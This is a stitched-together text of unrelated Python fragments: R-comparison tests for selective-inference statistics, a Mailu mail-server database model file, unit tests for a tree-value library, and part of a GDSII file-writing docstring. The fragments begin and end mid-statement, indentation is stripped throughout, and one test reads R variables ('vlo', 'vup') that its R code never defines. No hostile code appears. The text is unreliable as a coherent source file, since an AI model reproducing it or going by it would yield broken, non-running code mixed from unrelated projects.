vup = out.seq$vup
"""
rpy.r(R_code)
R_pvals = np.asarray(rpy.r('pval'))
sigma = float(np.asarray(rpy.r('sigma')))
selected_vars = np.asarray(rpy.r('vars'))
y = np.asarray(rpy.r('y'))
beta_hat = np.asarray(rpy.r('beta_hat'))
x = np.asarray(rpy.r('x'))
y = y.reshape(-1)
y -= y.mean()
x -= x.mean(0)[None,:]
vlo = np.asarray(rpy.r('vlo'))
vup = np.asarray(rpy.r('vup'))
print(np.vstack([vlo, vup]).T)
FS = forward_step(x, y, covariance=sigma**2 * np.identity(y.shape[0]))
steps = []
for i in range(x.shape[1]):
FS.step()
steps.extend(FS.model_pivots(i+1,
which_var=FS.variables[-1:],
alternative='onesided'))
print(selected_vars, [i+1 for i, p in steps])
print(FS.variables, FS.signs)
np.testing.assert_array_equal(selected_vars, [i + 1 for i, p in steps])
np.testing.assert_allclose([p for i, p in steps], R_pvals, atol=tol, rtol=tol)
@np.testing.dec.skipif(not rpy2_available, msg="rpy2 not available, skipping test")
def test_forward_step_all():
"""
Check that forward step results agree with R
"""
tol = 1.e-5
R_code = """
library(selectiveInference)
set.seed(33)
n = 50
p = 10
sigma = 1.1
x = matrix(rnorm(n*p),n,p)
beta = c(3,2,rep(0,p-2))
y = x%*%beta + sigma*rnorm(n)
# run forward stepwise
fsfit = fs(x,y)
beta_hat = fsfit$beta
# compute sequential p-values and confidence intervals
out.seq = fsInf(fsfit,sigma=sigma, type='all', k=5)
vars = out.seq$vars
pval = out.seq$pv
"""
rpy.r(R_code)
R_pvals = np.asarray(rpy.r('pval'))
sigma = float(np.asarray(rpy.r('sigma')))
selected_vars = np.asarray(rpy.r('vars'))
y = np.asarray(rpy.r('y'))
beta_hat = np.asarray(rpy.r('beta_hat'))
x = np.asarray(rpy.r('x'))
y = y.reshape(-1)
y -= y.mean()
x -= x.mean(0)[None,:]
vlo = np.asarray(rpy.r('vlo'))
vup = np.asarray(rpy.r('vup'))
print(np.vstack([vlo, vup]).T)
FS = forward_step(x, y, covariance=sigma**2 * np.identity(y.shape[0]))
steps = []
for i in range(5):
FS.step()
steps = FS.model_pivots(5,
alternative='onesided')
np.testing.assert_array_equal(selected_vars, [i + 1 for i, p in steps])
np.testing.assert_allclose([p for i, p in steps], R_pvals, atol=tol, rtol=tol)
print (R_pvals, [p for i, p in steps])
@np.testing.dec.skipif(not rpy2_available or not statsmodels_available, msg="rpy2 not available, skipping test")
def test_coxph():
"""
Check that Cox results agree with R
"""
tol = 1.e-5
R_code = """
library(selectiveInference)
set.seed(43)
n = 50
p = 10
sigma = 1.1
x = matrix(rnorm(n*p),n,p)
x=scale(x,TRUE,TRUE)
beta = c(3,2,rep(0,p-2))
tim = as.vector(x%*%beta + sigma*rnorm(n))
tim= tim-min(tim)+1
status=sample(c(0,1),size=n,replace=T)
# first run glmnet
gfit = glmnet(x,Surv(tim,status),standardize=FALSE,family="cox", thresh=1.e-14)
# extract coef for a given lambda; note the 1/n factor!
lambda = 1.5
beta_hat = as.numeric(coef(gfit, s=lambda/n, exact=TRUE, x=x, y=Surv(tim, status)))
# compute fixed lambda p-values and selection intervals
out = fixedLassoInf(x,tim,beta_hat,lambda,status=status,family="cox")
pval = out$pv
vars_cox = out$var
"""
rpy.r(R_code)
R_pvals = np.asarray(rpy.r('pval'))
selected_vars = np.asarray(rpy.r('vars_cox'))
tim = np.asarray(rpy.r('tim'))
tim = tim.reshape(-1)
status = np.asarray(rpy.r('status'))
status = status.reshape(-1)
beta_hat = np.asarray(rpy.r('beta_hat'))
x = np.asarray(rpy.r('x'))
L = lasso.cox(x, tim, status, 1.5)
beta2 = L.fit()
G1 = L.loglike.gradient(beta_hat)
G2 = L.loglike.gradient(beta2)
print(G1, 'glmnet')
print(G2, 'regreg')
yield np.testing.assert_equal, np.array(L.active) + 1, selected_vars
yield np.testing.assert_allclose, beta2, beta_hat, tol, tol, False, 'cox coeff'
yield np.testing.assert_allclose, L.summary('onesided')['pvalue'], R_pvals, tol, tol, False, 'cox pvalues'
@np.testing.dec.skipif(not rpy2_available, msg="rpy2 not available, skipping test")
def test_logistic():
"""
Check that logistic results agree with R
"""
tol = 1.e-4
R_code = """
library(selectiveInference)
set.seed(43)
n = 50
p = 10
sigma = 10
x = matrix(rnorm(n*p),n,p)
x=scale(x,TRUE,TRUE)
beta = c(3,2,rep(0,p-2))
y = x %*% beta + sigma * rnorm(n)
y=1*(y>mean(y))
# first run glmnet
gfit = glmnet(x,y,standardize=FALSE,family="binomial")
# extract coef for a given lambda; note the 1/n factor!
# (and here we DO include the intercept term)
lambda = .8
beta_hat = as.numeric(coef(gfit, s=lambda/n, exact=TRUE, x=x, y=y))
# compute fixed lambda p-values and selection intervals
out = fixedLassoInf(x,y,beta_hat,lambda,family="binomial")
vlo = out$vlo
vup = out$vup
sdvar = out$sd
coef=out$coef0
info_mat=out$info.matrix
beta_hat = beta_hat[c(1, out$vars+1)]
out
pval = out$pv
vars_logit = out$var
"""
rpy.r(R_code)
R_pvals = np.asarray(rpy.r('pval'))
selected_vars = np.asarray(rpy.r('vars_logit'))
y = np.asarray(rpy.r('y'))
y = y.reshape(-1)
beta_hat = np.asarray(rpy.r('as.numeric(beta_hat)'))
x = np.asarray(rpy.r('x'))
x = np.hstack([np.ones((x.shape[0],1)), x])
L = lasso.logistic(x, y, [0] + [0.8] * (x.shape[1]-1))
beta2 = L.fit()[L.active]
yield np.testing.assert_equal, L.active[1:], selected_vars
yield np.testing.assert_allclose, beta2, beta_hat, tol, tol, False, 'logistic coef'
yield np.testing.assert_allclose, L.summary('onesided')['pvalue'][1:], R_pvals, tol, tol, False, 'logistic pvalues'
@np.testing.dec.skipif(not rpy2_available, msg="rpy2 not available, skipping test")
def test_solve_QP_lasso():
"""
Check the R coordinate descent LASSO solver
"""
n, p = 100, 200
lam = 0.1
X = np.random.standard_normal((n, p))
Y = np.random.standard_normal(n)
loss = rr.squared_error(X, Y, coef=1./n)
pen = rr.l1norm(p, lagrange=lam)
problem = rr.simple_problem(loss, pen)
soln = problem.solve(min_its=500, tol=1.e-12)
numpy2ri.activate()
rpy.r.assign('X', X)
rpy.r.assign('Y', Y)
rpy.r.assign('lam', lam)
R_code = """
library(selectiveInference)
p = ncol(X)
n = nrow(X)
soln_R = rep(0, p)
grad = -t(X) %*% Y / n
ever_active = as.integer(c(1, rep(0, p-1)))
nactive = as.integer(1)
kkt_tol = 1.e-12
objective_tol = 1.e-16
parameter_tol = 1.e-10
maxiter = 500
soln_R = selectiveInference:::solve_QP(t(X) %*% X / n,
lam,
maxiter,
soln_R,
1. * grad,
grad,
ever_active,
nactive,
kkt_tol,
objective_tol,
parameter_tol,
p,
TRUE,
TRUE,
TRUE)$soln
# test wide solver
Xtheta = rep(0, n)
nactive = as.integer(1)
ever_active = as.integer(c(1, rep(0, p-1)))
soln_R_wide = rep(0, p)
grad = - t(X) %*% Y / n
soln_R_wide = selectiveInference:::solve_QP_wide(X,
rep(lam, p),
0,
maxiter,
soln_R_wide,
1. * grad,
grad,
Xtheta,
ever_active,
nactive,
kkt_tol,
objective_tol,
parameter_tol,
p,
TRUE,
TRUE,
TRUE)$soln
"""
rpy.r(R_code)
soln_R = np.asarray(rpy.r('soln_R'))
soln_R_wide = np.asarray(rpy.r('soln_R_wide'))
numpy2ri.deactivate()
tol = 1.e-5
print(soln - soln_R)
print(soln_R - soln_R_wide)
yield np.testing.assert_allclose, soln, soln_R, tol, tol, False, 'checking coordinate QP solver for LASSO problem'
yield np.testing.assert_allclose, soln, soln_R_wide, tol, tol, False, 'checking wide coordinate QP solver for LASSO problem'
@np.testing.dec.skipif(not rpy2_available, msg="rpy2 not available, skipping test")
def test_solve_QP():
"""
Check the R coordinate descent LASSO solver
"""
n, p = 100, 50
lam = 0.08
X = np.random.standard_normal((n, p))
loss = rr.squared_error(X, np.zeros(n), coef=1./n)
pen = rr.l1norm(p, lagrange=lam)
E = np.zeros(p)
E[2] = 1
Q = rr.identity_quadratic(0, 0, E, 0)
problem = rr.simple_problem(loss, pen)
soln = problem.solve(Q, min_its=500, tol=1.e-12)
numpy2ri.activate()
rpy.r.assign('X', X)
rpy.r.assign('E', E)
rpy.r.assign('lam', lam)
R_code = """
library(selectiveInference)
p = ncol(X)
n = nrow(X)
soln_R = rep(0, p)
grad = 1. * E
ever_active = as.integer(c(1, rep(0, p-1)))
nactive = as.integer(1)
kkt_tol = 1.e-12
objective_tol = 1.e-16
parameter_tol = | |
<reponame>tothadi/Mailu
""" Mailu config storage model
"""
import os
import smtplib
import json
from datetime import date
from email.mime import text
from itertools import chain
import flask_sqlalchemy
import sqlalchemy
import passlib.context
import passlib.hash
import passlib.registry
import time
import os
import hmac
import smtplib
import idna
import dns
from flask import current_app as app
from sqlalchemy.ext import declarative
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy.inspection import inspect
from werkzeug.utils import cached_property
from mailu import dkim
db = flask_sqlalchemy.SQLAlchemy()
class IdnaDomain(db.TypeDecorator):
""" Stores a Unicode string in it's IDNA representation (ASCII only)
"""
impl = db.String(80)
def process_bind_param(self, value, dialect):
""" encode unicode domain name to punycode """
return idna.encode(value.lower()).decode('ascii')
def process_result_value(self, value, dialect):
""" decode punycode domain name to unicode """
return idna.decode(value)
python_type = str
class IdnaEmail(db.TypeDecorator):
""" Stores a Unicode string in it's IDNA representation (ASCII only)
"""
impl = db.String(255)
def process_bind_param(self, value, dialect):
""" encode unicode domain part of email address to punycode """
localpart, domain_name = value.rsplit('@', 1)
if '@' in localpart:
raise ValueError('email local part must not contain "@"')
domain_name = domain_name.lower()
return f'{localpart}@{idna.encode(domain_name).decode("ascii")}'
def process_result_value(self, value, dialect):
""" decode punycode domain part of email to unicode """
localpart, domain_name = value.rsplit('@', 1)
return f'{localpart}@{idna.decode(domain_name)}'
python_type = str
class CommaSeparatedList(db.TypeDecorator):
""" Stores a list as a comma-separated string, compatible with Postfix.
"""
impl = db.String
def process_bind_param(self, value, dialect):
""" join list of items to comma separated string """
if not isinstance(value, (list, tuple, set)):
raise TypeError('Must be a list of strings')
for item in value:
if ',' in item:
raise ValueError('list item must not contain ","')
return ','.join(sorted(set(value)))
def process_result_value(self, value, dialect):
""" split comma separated string to list """
return list(filter(bool, (item.strip() for item in value.split(',')))) if value else []
python_type = list
class JSONEncoded(db.TypeDecorator):
""" Represents an immutable structure as a json-encoded string.
"""
impl = db.String
def process_bind_param(self, value, dialect):
""" encode data as json """
return json.dumps(value) if value else None
def process_result_value(self, value, dialect):
""" decode json to data """
return json.loads(value) if value else None
python_type = str
class Base(db.Model):
""" Base class for all models
"""
__abstract__ = True
metadata = sqlalchemy.schema.MetaData(
naming_convention={
'fk': '%(table_name)s_%(column_0_name)s_fkey',
'pk': '%(table_name)s_pkey'
}
)
created_at = db.Column(db.Date, nullable=False, default=date.today)
updated_at = db.Column(db.Date, nullable=True, onupdate=date.today)
comment = db.Column(db.String(255), nullable=True, default='')
def __str__(self):
pkey = self.__table__.primary_key.columns.values()[0].name
if pkey == 'email':
# ugly hack for email declared attr. _email is not always up2date
return str(f'{self.localpart}@{self.domain_name}')
return str(getattr(self, pkey))
def __repr__(self):
return f'<{self.__class__.__name__} {str(self)!r}>'
def __eq__(self, other):
if isinstance(other, self.__class__):
pkey = self.__table__.primary_key.columns.values()[0].name
this = getattr(self, pkey, None)
other = getattr(other, pkey, None)
return this is not None and other is not None and str(this) == str(other)
else:
return NotImplemented
# we need hashable instances here for sqlalchemy to update collections
# in collections.bulk_replace, but auto-incrementing don't always have
# a valid primary key, in this case we use the object's id
__hashed = None
def __hash__(self):
if self.__hashed is None:
primary = getattr(self, self.__table__.primary_key.columns.values()[0].name)
self.__hashed = id(self) if primary is None else hash(primary)
return self.__hashed
# Many-to-many association table for domain managers
managers = db.Table('manager', Base.metadata,
db.Column('domain_name', IdnaDomain, db.ForeignKey('domain.name')),
db.Column('user_email', IdnaEmail, db.ForeignKey('user.email'))
)
class Config(Base):
""" In-database configuration values
"""
name = db.Column(db.String(255), primary_key=True, nullable=False)
value = db.Column(JSONEncoded)
def _save_dkim_keys(session):
""" store DKIM keys after commit """
for obj in session.identity_map.values():
if isinstance(obj, Domain):
obj.save_dkim_key()
class Domain(Base):
""" A DNS domain that has mail addresses associated to it.
"""
__tablename__ = 'domain'
name = db.Column(IdnaDomain, primary_key=True, nullable=False)
managers = db.relationship('User', secondary=managers,
backref=db.backref('manager_of'), lazy='dynamic')
max_users = db.Column(db.Integer, nullable=False, default=-1)
max_aliases = db.Column(db.Integer, nullable=False, default=-1)
max_quota_bytes = db.Column(db.BigInteger, nullable=False, default=0)
signup_enabled = db.Column(db.Boolean, nullable=False, default=False)
_dkim_key = None
_dkim_key_on_disk = None
def _dkim_file(self):
""" return filename for active DKIM key """
return app.config['DKIM_PATH'].format(
domain=self.name,
selector=app.config['DKIM_SELECTOR']
)
def save_dkim_key(self):
""" save changed DKIM key to disk """
if self._dkim_key != self._dkim_key_on_disk:
file_path = self._dkim_file()
if self._dkim_key:
with open(file_path, 'wb') as handle:
handle.write(self._dkim_key)
elif os.path.exists(file_path):
os.unlink(file_path)
self._dkim_key_on_disk = self._dkim_key
@property
def dns_mx(self):
""" return MX record for domain """
hostname = app.config['HOSTNAMES'].split(',', 1)[0]
return f'{self.name}. 600 IN MX 10 {hostname}.'
@property
def dns_spf(self):
""" return SPF record for domain """
hostname = app.config['HOSTNAMES'].split(',', 1)[0]
return f'{self.name}. 600 IN TXT "v=spf1 mx a:{hostname} ~all"'
@property
def dns_dkim(self):
""" return DKIM record for domain """
if self.dkim_key:
selector = app.config['DKIM_SELECTOR']
return (
f'{selector}._domainkey.{self.name}. 600 IN TXT'
f'"v=DKIM1; k=rsa; p={self.dkim_publickey}"'
)
@property
def dns_dmarc(self):
""" return DMARC record for domain """
if self.dkim_key:
domain = app.config['DOMAIN']
rua = app.config['DMARC_RUA']
rua = f' rua=mailto:{rua}@{domain};' if rua else ''
ruf = app.config['DMARC_RUF']
ruf = f' ruf=mailto:{ruf}@{domain};' if ruf else ''
return f'_dmarc.{self.name}. 600 IN TXT "v=DMARC1; p=reject;{rua}{ruf} adkim=s; aspf=s"'
@property
def dkim_key(self):
""" return private DKIM key """
if self._dkim_key is None:
file_path = self._dkim_file()
if os.path.exists(file_path):
with open(file_path, 'rb') as handle:
self._dkim_key = self._dkim_key_on_disk = handle.read()
else:
self._dkim_key = self._dkim_key_on_disk = b''
return self._dkim_key if self._dkim_key else None
@dkim_key.setter
def dkim_key(self, value):
""" set private DKIM key """
old_key = self.dkim_key
self._dkim_key = value if value is not None else b''
if self._dkim_key != old_key:
if not sqlalchemy.event.contains(db.session, 'after_commit', _save_dkim_keys):
sqlalchemy.event.listen(db.session, 'after_commit', _save_dkim_keys)
@property
def dkim_publickey(self):
""" return public part of DKIM key """
dkim_key = self.dkim_key
if dkim_key:
return dkim.strip_key(dkim_key).decode('utf8')
def generate_dkim_key(self):
""" generate and activate new DKIM key """
self.dkim_key = dkim.gen_key()
def has_email(self, localpart):
""" checks if localpart is configured for domain """
for email in chain(self.users, self.aliases):
if email.localpart == localpart:
return True
return False
def check_mx(self):
""" checks if MX record for domain points to mailu host """
try:
hostnames = set(app.config['HOSTNAMES'].split(','))
return any(
rset.exchange.to_text().rstrip('.') in hostnames
for rset in dns.resolver.query(self.name, 'MX')
)
except dns.exception.DNSException:
return False
class Alternative(Base):
""" Alternative name for a served domain.
The name "domain alias" was avoided to prevent some confusion.
"""
__tablename__ = 'alternative'
name = db.Column(IdnaDomain, primary_key=True, nullable=False)
domain_name = db.Column(IdnaDomain, db.ForeignKey(Domain.name))
domain = db.relationship(Domain,
backref=db.backref('alternatives', cascade='all, delete-orphan'))
class Relay(Base):
""" Relayed mail domain.
The domain is either relayed publicly or through a specified SMTP host.
"""
__tablename__ = 'relay'
name = db.Column(IdnaDomain, primary_key=True, nullable=False)
smtp = db.Column(db.String(80), nullable=True)
class Email(object):
""" Abstraction for an email address (localpart and domain).
"""
localpart = db.Column(db.String(80), nullable=False)
@declarative.declared_attr
def domain_name(cls):
""" the domain part of the email address """
return db.Column(IdnaDomain, db.ForeignKey(Domain.name),
nullable=False, default=IdnaDomain)
# This field is redundant with both localpart and domain name.
# It is however very useful for quick lookups without joining tables,
# especially when the mail server is reading the database.
@declarative.declared_attr
def _email(cls):
""" the complete email address (localpart@domain) """
def updater(ctx):
key = f'{cls.__tablename__}_email'
if key in ctx.current_parameters:
return ctx.current_parameters[key]
return '{localpart}@{domain_name}'.format_map(ctx.current_parameters)
return db.Column('email', IdnaEmail, primary_key=True, nullable=False, onupdate=updater)
# We need to keep email, localpart and domain_name in sync.
# But IMHO using email as primary key was not a good idea in the first place.
@hybrid_property
def email(self):
""" getter for email - gets _email """
return self._email
@email.setter
def email(self, value):
""" setter for email - sets _email, localpart and domain_name at once """
self.localpart, self.domain_name = value.rsplit('@', 1)
self._email = value
@staticmethod
def _update_localpart(target, value, *_):
if target.domain_name:
target._email = f'{value}@{target.domain_name}'
@staticmethod
def _update_domain_name(target, value, *_):
if target.localpart:
target._email = f'{target.localpart}@{value}'
@classmethod
def __declare_last__(cls):
# gets called after mappings are completed
sqlalchemy.event.listen(cls.localpart, 'set', cls._update_localpart, propagate=True)
sqlalchemy.event.listen(cls.domain_name, 'set', cls._update_domain_name, propagate=True)
def sendmail(self, subject, body):
""" send an email to the address """
f_addr = f'{app.config["POSTMASTER"]}@{idna.encode(app.config["DOMAIN"]).decode("ascii")}'
with smtplib.SMTP(app.config['HOST_AUTHSMTP'], port=10025) as smtp:
to_address = f'{self.localpart}@{idna.encode(self.domain_name).decode("ascii")}'
msg = text.MIMEText(body)
msg['Subject'] = subject
msg['From'] = f_addr
msg['To'] = to_address
smtp.sendmail(f_addr, [to_address], msg.as_string())
@classmethod
def resolve_domain(cls, email):
""" resolves domain alternative to real domain """
localpart, domain_name = email.rsplit('@', 1) if '@' in email else (None, email)
alternative = Alternative.query.get(domain_name)
if alternative:
domain_name = alternative.domain_name
return (localpart, domain_name)
@classmethod
def resolve_destination(cls, localpart, domain_name, ignore_forward_keep=False):
""" return destination for email address localpart@domain_name """
localpart_stripped = None
stripped_alias = None
if os.environ.get('RECIPIENT_DELIMITER') in localpart:
localpart_stripped = localpart.rsplit(os.environ.get('RECIPIENT_DELIMITER'), 1)[0]
user = User.query.get(f'{localpart}@{domain_name}')
if not user and localpart_stripped:
user = User.query.get(f'{localpart_stripped}@{domain_name}')
if user:
email = f'{localpart}@{domain_name}'
if user.forward_enabled:
destination = user.forward_destination
if user.forward_keep | |
1, 'b': 2, 'x': {'c': 3, 'd': 4}})
t2 = tree_value_clazz({'a': 11, 'b': 22, 'x': {'c': 33, 'd': 5}})
assert (t2 >> t1) == tree_value_clazz({'a': 5, 'b': 5, 'x': {'c': 4, 'd': 0}})
assert (32 >> t1) == tree_value_clazz({'a': 16, 'b': 8, 'x': {'c': 4, 'd': 2}})
original_id = id(t2._detach())
original_id_x = id(t2.x._detach())
t4 = t2 >> t1
t2 >>= t1
assert t2 == t4
assert id(t2._detach()) == original_id
assert id(t2.x._detach()) == original_id_x
def test_numeric_pos(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
assert +t1 == tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
def test_numeric_neg(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
assert -t1 == tree_value_clazz({'a': -1, 'b': -2, 'x': {'c': -3, 'd': -4}})
def test_numeric_invert(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
assert ~t1 == tree_value_clazz({'a': -2, 'b': -3, 'x': {'c': -4, 'd': -5}})
def test_getitem(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
t2 = tree_value_clazz({'a': [2, 3, 5, 7], 'b': [11, 13, 17, 19],
'x': {'c': [23, 29, 31, 37], 'd': [41, 43, 47, 53]}})
assert t2[t1 - 1] == tree_value_clazz({'a': 2, 'b': 13, 'x': {'c': 31, 'd': 53}})
def test_setitem(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
t2 = tree_value_clazz({'a': [2, 3, 5, 7], 'b': [11, 13, 17, 19],
'x': {'c': [23, 29, 31, 37], 'd': [41, 43, 47, 53]}})
t2[t1 - 1] = t1
assert t2 == tree_value_clazz({'a': [1, 3, 5, 7], 'b': [11, 2, 17, 19],
'x': {'c': [23, 29, 3, 37], 'd': [41, 43, 47, 4]}})
def test_delitem(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
t2 = tree_value_clazz({'a': [2, 3, 5, 7], 'b': [11, 13, 17, 19],
'x': {'c': [23, 29, 31, 37], 'd': [41, 43, 47, 53]}})
del t2[t1 - 1]
assert t2 == tree_value_clazz({'a': [3, 5, 7], 'b': [11, 17, 19],
'x': {'c': [23, 29, 37], 'd': [41, 43, 47]}})
def test_attr(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
t2 = func_treelize(return_type=tree_value_clazz)(Container)(t1)
assert t2 == tree_value_clazz(
{'a': Container(1), 'b': Container(2), 'x': {'c': Container(3), 'd': Container(4)}})
assert t2.value == t1
def test_call(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
t2 = func_treelize(return_type=tree_value_clazz)(Container)(t1)
assert t2.add(10) == tree_value_clazz({'a': 11, 'b': 12, 'x': {'c': 13, 'd': 14}})
assert t2.add(x=10) == tree_value_clazz({'a': 11, 'b': 12, 'x': {'c': 13, 'd': 14}})
assert t2.add(t1) == tree_value_clazz({'a': 2, 'b': 4, 'x': {'c': 6, 'd': 8}})
def test_map(self):
cnt = 0
def f(x):
nonlocal cnt
cnt += 1
return x + 2
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
assert cnt == 0
t2 = t1.map(f)
assert cnt == 4
assert t2 == tree_value_clazz({'a': 3, 'b': 4, 'x': {'c': 5, 'd': 6}})
cnt = 0
t3 = tree_value_clazz({
'a': delayed(lambda: t1.a),
'b': delayed(lambda: t1.b),
'x': delayed(lambda: t1.x),
})
assert cnt == 0
t4 = t3.map(f, delayed=True)
assert cnt == 0
assert t4.a == 3
assert cnt == 1
assert t4 == tree_value_clazz({'a': 3, 'b': 4, 'x': {'c': 5, 'd': 6}})
assert cnt == 4
assert t4.a == 3
assert cnt == 4
def test_type(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
assert t1.type(TreeValue) == TreeValue({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
assert t1.type(TreeValue) != tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
def test_filter(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
assert t1.filter(lambda x: x % 2 == 1) == tree_value_clazz({'a': 1, 'x': {'c': 3}})
assert t1.filter(lambda x: x < 3) == tree_value_clazz({'a': 1, 'b': 2, })
assert t1.filter(lambda x: x < 3, False) == tree_value_clazz({'a': 1, 'b': 2, 'x': {}})
def test_mask(self):
t1 = tree_value_clazz({'a': 13, 'b': 27, 'x': {'c': 39, 'd': 45}})
t2 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
t3 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 7, 'd': 4}})
mask1 = t2.map(lambda x: (lambda v: v % x == 0))(t1)
assert t1.mask(mask1) == tree_value_clazz({'a': 13, 'x': {'c': 39}})
mask2 = t3.map(lambda x: (lambda v: v % x == 0))(t1)
assert t1.mask(mask2) == tree_value_clazz({'a': 13})
assert t1.mask(mask2, False) == tree_value_clazz({'a': 13, 'x': {}})
def test_reduce(self):
t1 = tree_value_clazz({'a': 13, 'b': 27, 'x': {'c': 39, 'd': 45}})
t2 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
assert t1.reduce(lambda **kwargs: sum(kwargs.values())) == 124
assert t2.reduce(lambda **kwargs: reduce(__mul__, kwargs.values())) == 24
def test_union(self):
t1 = tree_value_clazz({'a': 13, 'b': 27, 'x': {'c': 39, 'd': 45}})
t2 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
t3 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 7, 'd': 4}})
assert tree_value_clazz.union(t1, t2, t3) == tree_value_clazz({
'a': (13, 1, 1),
'b': (27, 2, 2),
'x': {
'c': (39, 3, 7),
'd': (45, 4, 4),
}
})
assert tree_value_clazz.union(t1, t2, t3, return_type=TreeValue) == TreeValue({
'a': (13, 1, 1),
'b': (27, 2, 2),
'x': {
'c': (39, 3, 7),
'd': (45, 4, 4),
}
})
def test_subside(self):
data = {
'a': TreeValue({'a': 1, 'b': 2}),
'x': {
'c': TreeValue({'a': 3, 'b': 4}),
'd': [
TreeValue({'a': 5, 'b': 6}),
TreeValue({'a': 7, 'b': 8}),
]
},
'k': '233'
}
assert tree_value_clazz.subside(data) == tree_value_clazz({
'a': raw({'a': 1, 'k': '233', 'x': {'c': 3, 'd': [5, 7]}}),
'b': raw({'a': 2, 'k': '233', 'x': {'c': 4, 'd': [6, 8]}}),
})
assert tree_value_clazz.subside(data, return_type=TreeValue) == TreeValue({
'a': raw({'a': 1, 'k': '233', 'x': {'c': 3, 'd': [5, 7]}}),
'b': raw({'a': 2, 'k': '233', 'x': {'c': 4, 'd': [6, 8]}}),
})
def test_rise(self):
data = {
'a': TreeValue({'a': 1, 'b': 2}),
'x': {
'c': TreeValue({'a': 3, 'b': 4}),
'd': [
TreeValue({'a': 5, 'b': 6}),
TreeValue({'a': 7, 'b': 8}),
]
},
'k': '233'
}
t1 = tree_value_clazz.subside(data)
assert t1.rise() == {
'a': tree_value_clazz({'a': 1, 'b': 2}),
'x': {
'c': tree_value_clazz({'a': 3, 'b': 4}),
'd': [
tree_value_clazz({'a': 5, 'b': 6}),
tree_value_clazz({'a': 7, 'b': 8}),
]
},
'k': tree_value_clazz({'a': '233', 'b': '233'}),
}
def test_deep_clone(self):
t = tree_value_clazz({
'a': raw({'a': 1, 'b': 2}),
'b': raw({'a': 3, 'b': 4}),
'x': {
'c': raw({'a': 5, 'b': 6}),
'd': raw({'a': 7, 'b': 8}),
}
})
t1 = t.clone()
assert t1 == t
assert t1.a is t.a
assert t1.b is t.b
assert t1.x.c is t.x.c
assert t1.x.d is t.x.d
t2 = t.clone(copy_value=True)
assert t2 == t
assert t2.a is not t.a
assert t2.b is not t.b
assert t2.x.c is not t.x.c
assert t2.x.d is not t.x.d
def test_graph(self):
t = tree_value_clazz({
'a': [4, 3, 2, 1],
'b': np.array([[5, 6], [7, 8]]),
'x': {
'c': np.array([[5, 7], [8, 6]]),
'd': {'a', 'b', 'c'},
'e': np.array([[1, 2], [3, 4]])
},
})
graph = t.graph('t')
assert 2210 <= len(graph.source) <= 2290
def test_graphics(self):
t = tree_value_clazz({
'a': [4, 3, 2, 1],
'b': np.array([[5, 6], [7, 8]]),
'x': {
'c': np.array([[5, 7], [8, 6]]),
'd': {'a', 'b', 'c'},
'e': np.array([[1, 2], [3, 4]])
},
})
t1 = tree_value_clazz({
'aa': t.a,
'bb': np.array([[5, 6], [7, 8]]),
'xx': {
'cc': t.x.c,
'dd': t.x.d,
'ee': np.array([[1, 2], [3, 4]])
},
})
graph_1 = tree_value_clazz.graphics(
(t, 't'), (t1, 't1'),
(tree_value_clazz({'a': t, 'b': t1, 'c': [1, 2], 'd': t1.xx}), 't2'),
dup_value=(np.ndarray, list),
title="This is a demo of 2 trees with dup value.",
cfg={'bgcolor': '#ffffffff'},
)
assert 4910 <= len(graph_1.source) <= 4960
graph_2 = tree_value_clazz.graphics(
(t, 't'), (t1, 't1'),
(tree_value_clazz({'a': t, 'b': t1, 'c': [1, 2], 'd': t1.xx}), 't2'),
dup_value=False,
title="This is a demo of 2 trees with dup value.",
cfg={'bgcolor': '#ffffffff'},
)
assert 5420 <= len(graph_2.source) <= 5480
graph_3 = tree_value_clazz.graphics(
(t, 't'), (t1, 't1'),
(tree_value_clazz({'a': t, 'b': t1, 'c': [1, 2], 'd': t1.xx}), 't2'),
dup_value=lambda x: id(x),
title="This is a demo of 2 trees with dup value.",
cfg={'bgcolor': '#ffffffff'},
)
assert 4700 <= len(graph_3.source) <= 4760
graph_4 = tree_value_clazz.graphics(
(t, 't'), (t1, 't1'),
(tree_value_clazz({'a': t, 'b': t1, 'c': [1, 2], 'd': t1.xx}), 't2'),
dup_value=lambda x: type(x).__name__,
title="This is | |
GDSII file will be the
dimensions of the objects created times the ratio
unit/precision. For example, if a circle with radius 1.5 is
created and we set `GdsLibrary.unit` to 1.0e-6 (1 um) and
`GdsLibrary.precision` to 1.0e-9` (1 nm), the radius of the
circle will be 1.5 um and the GDSII file will contain the
dimension 1500 nm.
Parameters
----------
outfile : file, string or Path
The file (or path) where the GDSII stream will be written.
It must be opened for writing operations in binary format.
cells : iterable
The cells or cell names to be included in the library. If
None, all cells are used.
timestamp : datetime object
Sets the GDSII timestamp. If None, the current time is
used.
binary_cells : iterable of bytes
Iterable with binary data for GDSII cells (from
`get_binary_cells`, for example).
Notes
-----
Only the specified cells are written. The user is responsible
for ensuring all cell dependencies are satisfied.
"""
close = True
if hasattr(outfile, "__fspath__"):
outfile = open(outfile.__fspath__(), "wb")
elif isinstance(outfile, (basestring, Path)):
outfile = open(outfile, "wb")
else:
close = False
